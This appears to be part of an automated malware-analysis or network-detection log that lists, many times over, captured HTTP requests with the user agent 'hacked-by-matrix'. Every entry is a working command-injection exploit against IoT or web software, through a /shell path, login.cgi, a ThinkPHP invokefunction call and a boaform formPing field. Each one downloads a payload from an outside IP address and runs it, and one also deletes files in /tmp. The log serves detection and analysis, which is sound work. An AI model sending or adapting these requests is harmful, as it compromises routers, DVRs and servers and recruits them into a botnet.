          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
